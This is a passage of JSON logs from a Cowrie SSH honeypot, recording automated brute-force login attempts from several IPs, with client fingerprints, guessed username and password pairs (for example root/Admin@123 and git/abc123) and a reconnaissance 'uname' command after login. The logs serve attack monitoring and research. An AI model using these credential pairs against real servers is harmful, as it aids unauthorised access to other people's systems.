com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:20:56.732723Z","src_ip":"41.226.27.251","session":"003731a5bd74"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:20:56.863021Z","src_ip":"41.226.27.251","session":"003731a5bd74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:20:56.964428Z","src_ip":"41.226.27.251","session":"003731a5bd74"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:20:56.965185Z","src_ip":"41.226.27.251","session":"003731a5bd74"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:57.009419Z","src_ip":"41.226.27.251","session":"003731a5bd74"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:20:57.010542Z","src_ip":"41.226.27.251","session":"003731a5bd74"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:21:04.761035Z","src_ip":"212.227.235.229","session":"a7061a7309e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42568,"dst_ip":"1.2.3.4","dst_port":22,"session":"51d3f775679a","protocol":"ssh","message":"New connection: 212.227.235.229:42568 (1.2.3.4:22) [session: 51d3f775679a]","sensor":"my-vps","timestamp":"2025-08-31T03:21:04.790143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:05.543090Z","src_ip":"212.227.235.229","session":"51d3f775679a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:21:05.543833Z","src_ip":"212.227.235.229","session":"51d3f775679a"}
{"eventid":"cowrie.login.failed","username":"git","password":"abc123","message":"login attempt [git/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:21:11.810411Z","src_ip":"212.227.235.229","session":"51d3f775679a"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:13.657058Z","src_ip":"212.227.235.229","session":"51d3f775679a"}
{"eventid":"cowrie.session.closed","duration":"49.1","message":"Connection lost after 49.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:15.348806Z","src_ip":"212.227.235.229","session":"a7061a7309e8"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":32988,"dst_ip":"1.2.3.4","dst_port":22,"session":"781bbc80c9d1","protocol":"ssh","message":"New connection: 34.14.223.46:32988 (1.2.3.4:22) [session: 781bbc80c9d1]","sensor":"my-vps","timestamp":"2025-08-31T03:21:16.517244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:16.518930Z","src_ip":"34.14.223.46","session":"781bbc80c9d1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T03:21:16.784421Z","src_ip":"34.14.223.46","session":"781bbc80c9d1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34406,"dst_ip":"1.2.3.4","dst_port":22,"session":"96629ba49e1c","protocol":"ssh","message":"New connection: 41.226.27.251:34406 (1.2.3.4:22) [session: 96629ba49e1c]","sensor":"my-vps","timestamp":"2025-08-31T03:21:17.013502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:17.014827Z","src_ip":"41.226.27.251","session":"96629ba49e1c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:21:17.060421Z","src_ip":"41.226.27.251","session":"96629ba49e1c"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:21:17.209094Z","src_ip":"41.226.27.251","session":"96629ba49e1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:21:17.761058Z","src_ip":"41.226.27.251","session":"96629ba49e1c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:21:17.761925Z","src_ip":"41.226.27.251","session":"96629ba49e1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:17.808302Z","src_ip":"41.226.27.251","session":"96629ba49e1c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:17.809520Z","src_ip":"41.226.27.251","session":"96629ba49e1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37402,"dst_ip":"1.2.3.4","dst_port":22,"session":"96315eebce88","protocol":"ssh","message":"New connection: 212.227.125.160:37402 (1.2.3.4:22) [session: 96315eebce88]","sensor":"my-vps","timestamp":"2025-08-31T03:21:19.083098Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51624,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb30468d4132","protocol":"ssh","message":"New connection: 212.227.235.229:51624 (1.2.3.4:22) [session: cb30468d4132]","sensor":"my-vps","timestamp":"2025-08-31T03:21:23.861856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:23.886578Z","src_ip":"212.227.235.229","session":"cb30468d4132"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-31T03:21:24.475076Z","src_ip":"212.227.235.229","session":"cb30468d4132"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:24.518374Z","src_ip":"34.14.223.46","session":"781bbc80c9d1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:24.621081Z","src_ip":"212.227.235.229","session":"cb30468d4132"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:25.363818Z","src_ip":"212.227.125.160","session":"96315eebce88"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:21:25.365105Z","src_ip":"212.227.125.160","session":"96315eebce88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32798,"dst_ip":"1.2.3.4","dst_port":22,"session":"96029fb6cd2c","protocol":"ssh","message":"New connection: 212.227.125.160:32798 (1.2.3.4:22) [session: 96029fb6cd2c]","sensor":"my-vps","timestamp":"2025-08-31T03:21:26.354081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:27.099743Z","src_ip":"212.227.125.160","session":"96029fb6cd2c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:21:27.100507Z","src_ip":"212.227.125.160","session":"96029fb6cd2c"}
{"eventid":"cowrie.login.failed","username":"git","password":"abc123","message":"login attempt [git/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:21:29.860317Z","src_ip":"212.227.125.160","session":"96029fb6cd2c"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:31.293084Z","src_ip":"212.227.125.160","session":"96029fb6cd2c"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":40412,"dst_ip":"1.2.3.4","dst_port":22,"session":"80fef3f325cc","protocol":"ssh","message":"New connection: 41.226.27.251:40412 (1.2.3.4:22) [session: 80fef3f325cc]","sensor":"my-vps","timestamp":"2025-08-31T03:21:36.804510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:36.871435Z","src_ip":"41.226.27.251","session":"80fef3f325cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:21:36.872509Z","src_ip":"41.226.27.251","session":"80fef3f325cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:21:37.052016Z","src_ip":"41.226.27.251","session":"80fef3f325cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:21:37.167451Z","src_ip":"41.226.27.251","session":"80fef3f325cc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:21:37.168336Z","src_ip":"41.226.27.251","session":"80fef3f325cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:37.215145Z","src_ip":"41.226.27.251","session":"80fef3f325cc"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:37.216198Z","src_ip":"41.226.27.251","session":"80fef3f325cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44104,"dst_ip":"1.2.3.4","dst_port":22,"session":"862917409734","protocol":"ssh","message":"New connection: 212.227.125.160:44104 (1.2.3.4:22) [session: 862917409734]","sensor":"my-vps","timestamp":"2025-08-31T03:21:39.062023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:21:39.062654Z","src_ip":"212.227.125.160","session":"862917409734"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:21:39.331646Z","src_ip":"212.227.125.160","session":"862917409734"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"123@123a","message":"login attempt [tempusr/123@123a] failed","sensor":"my-vps","timestamp":"2025-08-31T03:21:40.470566Z","src_ip":"212.227.125.160","session":"862917409734"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:41.734831Z","src_ip":"212.227.125.160","session":"862917409734"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51120,"dst_ip":"1.2.3.4","dst_port":22,"session":"b71963277d94","protocol":"ssh","message":"New connection: 212.227.235.229:51120 (1.2.3.4:22) [session: b71963277d94]","sensor":"my-vps","timestamp":"2025-08-31T03:21:50.176681Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:21:56.214000Z","src_ip":"212.227.125.160","session":"96315eebce88"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:56.425496Z","src_ip":"212.227.235.229","session":"b71963277d94"}
